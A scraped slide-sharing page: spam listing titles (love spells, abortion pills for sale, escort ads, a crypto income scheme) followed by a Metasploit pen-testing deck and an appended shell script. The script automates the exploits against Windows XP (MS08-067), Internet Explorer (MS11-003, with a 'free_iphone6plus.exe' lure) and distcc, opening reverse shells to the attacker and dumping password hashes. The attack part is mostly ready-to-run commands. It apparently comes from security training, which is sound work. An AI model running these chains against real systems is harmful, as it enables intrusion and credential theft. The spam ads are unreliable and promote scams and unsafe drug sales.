%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...masabamasaba
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionOnePlan Solutions
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyviewmasabamasaba
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastPapp Krisztián
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...SelfMade bd
 

Recently uploaded (20)

W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go Platformless
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the past
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 

Pen-Testing with Metasploit

  • 14. How does exploitation work? The attacker sends the exploit together with the payload to the vulnerable server. The exploit runs first and triggers the flaw; the payload then runs on the target, and the attacker uses the resulting channel to upload and download data.
  • 15. Meterpreter ▪ Used as the payload once a vulnerability has been exploited ▪ Improves post-exploitation: instead of a bare command shell it gives an in-memory agent with built-in commands (getuid, getsystem, hashdump, shell, ...)
  • 16. Meterpreter flow: exploit a vulnerability → select Meterpreter as the payload → receive a Meterpreter shell
  • 22. Windows XP Exploitation ▪ msf > search windows/smb ▪ msf > info exploit/windows/smb/ms08_067_netapi ▪ msf > use exploit/windows/smb/ms08_067_netapi ▪ msf exploit(ms08_067_netapi) > show payloads ▪ msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > set RHOST <target ip> (the target option is called RHOSTS in current Metasploit releases) ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip> ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > exploit ▪ meterpreter > background ▪ msf exploit(ms08_067_netapi) > sessions -l
  • 23. Windows XP Exploitation ▪ msf exploit(ms08_067_netapi) > sessions -i 1 ▪ meterpreter > getsystem -h (lists the privilege-escalation techniques; plain getsystem tries them) ▪ meterpreter > getuid ▪ meterpreter > hashdump (needs SYSTEM privileges, which is why getsystem comes first)
  • 24. Windows 7 Exploitation ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms11_003_ie_css_import) > show options ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <attacker ip> ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <attacker ip> ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443 ▪ msf exploit(ms11_003_ie_css_import) > exploit. This is a client-side (browser) exploit, so both SRVHOST (where the malicious page is served from) and LHOST (where the reverse shell connects back to) are the attacker's address, not the victim's. Then wait until the victim opens http://<attacker ip>:80/free_iphone6plus.exe in a vulnerable Internet Explorer.
  • 25. Windows 7 Exploitation ▪ msf exploit(ms11_003_ie_css_import) > sessions -l ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1 ▪ meterpreter > sysinfo ▪ meterpreter > shell
  • 26. Ubuntu Exploitation ▪ msf > search distcc ▪ msf > use exploit/unix/misc/distcc_exec ▪ msf exploit(distcc_exec) > show payloads ▪ msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse ▪ msf exploit(distcc_exec) > show options ▪ msf exploit(distcc_exec) > set RHOST <target ip> ▪ msf exploit(distcc_exec) > set LHOST <attacker ip> ▪ msf exploit(distcc_exec) > exploit
  • 28. Thanks To ▪ Kali / BackTrack Linux ▪ Metasploit Team (HD Moore & Rapid7) ▪ Offensive Security / Metasploit Unleashed ▪ David Kennedy ▪ Georgia Weidman ▪ Null Hyderabad Chapter -CORE TEAM ▪ #nullhyd @
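The three demos above (MS08-067 on Windows XP, MS11-003 on Windows 7 and distcc on Ubuntu) are typed interactively, which is fine on stage but easy to mistype. As an added example that is not part of the original deck, the shell script below writes the same command sequences as Metasploit resource scripts and hands them to `msfconsole -q -r`. It assumes a recent Metasploit Framework (the target option is RHOSTS; the `sleep` and `sessions -C` console commands and the `post/windows/escalate/getsystem` and `post/windows/gather/hashdump` modules exist); the IP addresses, the /tmp paths and the wait times for the reverse connection are placeholders to adjust for your own lab.

```shell
#!/bin/sh
# Added example (not from the slides): automate the Metasploit demos with
# resource scripts instead of retyping commands in msfconsole.
# Usage: ./msf_demo.sh xp|win7|distcc <attacker_ip> <target_ip> [lport]
# Assumption: recent Metasploit Framework (RHOSTS, `sleep`, `sessions -C`,
# post/windows/escalate/getsystem, post/windows/gather/hashdump).
set -eu

# MS08-067 on Windows XP: run the exploit as a background job, give the
# Meterpreter session time to come back, then do the post-exploitation steps.
# $1 = attacker ip, $2 = target ip, $3 = listener port (default 4444)
rc_ms08_067() {
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOSTS $2
set LHOST $1
set LPORT ${3:-4444}
exploit -j -z
sleep 20
sessions -l
sessions -i 1 -C getuid
use post/windows/escalate/getsystem
set SESSION 1
run
use post/windows/gather/hashdump
set SESSION 1
run
EOF
}

# MS11-003 browser exploit: the malicious page is served from the attacker
# (SRVHOST) and the reverse shell also comes back to the attacker (LHOST), so
# the target ip ($2) is not used; the victim has to open the URL.
rc_ms11_003() {
    cat <<EOF
use exploit/windows/browser/ms11_003_ie_css_import
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST $1
set SRVPORT 80
set URIPATH free_iphone6plus.exe
set LHOST $1
set LPORT ${3:-443}
exploit -j -z
EOF
}

# distcc on Ubuntu: cmd/unix/reverse gives a plain Unix shell, not Meterpreter.
rc_distcc() {
    cat <<EOF
use exploit/unix/misc/distcc_exec
set PAYLOAD cmd/unix/reverse
set RHOSTS $2
set LHOST $1
set LPORT ${3:-4444}
exploit -j -z
sleep 10
sessions -l
EOF
}

# Write the chosen resource script to /tmp and start msfconsole on it.
main() {
    demo="$1"; attacker="$2"; target="$3"; lport="${4:-}"
    rc="/tmp/msf_$demo.rc"
    case "$demo" in
        xp)     rc_ms08_067 "$attacker" "$target" "$lport" ;;
        win7)   rc_ms11_003 "$attacker" "$target" "$lport" ;;
        distcc) rc_distcc   "$attacker" "$target" "$lport" ;;
        *)      echo "unknown demo: $demo" >&2; return 1 ;;
    esac > "$rc"
    echo "resource script written to $rc" >&2
    exec msfconsole -q -r "$rc"
}

# Only launch when called with arguments; sourcing the file just defines the functions.
if [ "$#" -ge 3 ]; then
    main "$@"
fi
```

Run it from the attacking machine, for example `./msf_demo.sh xp 192.168.56.1 192.168.56.102`. `exploit -j -z` runs the module as a background job without dropping into the session, which is what lets the script continue to `sessions`, `getsystem` and `hashdump` once the reverse connection has arrived; if the session is not back after the `sleep`, those lines fail and you finish the steps by hand with `sessions -i 1`.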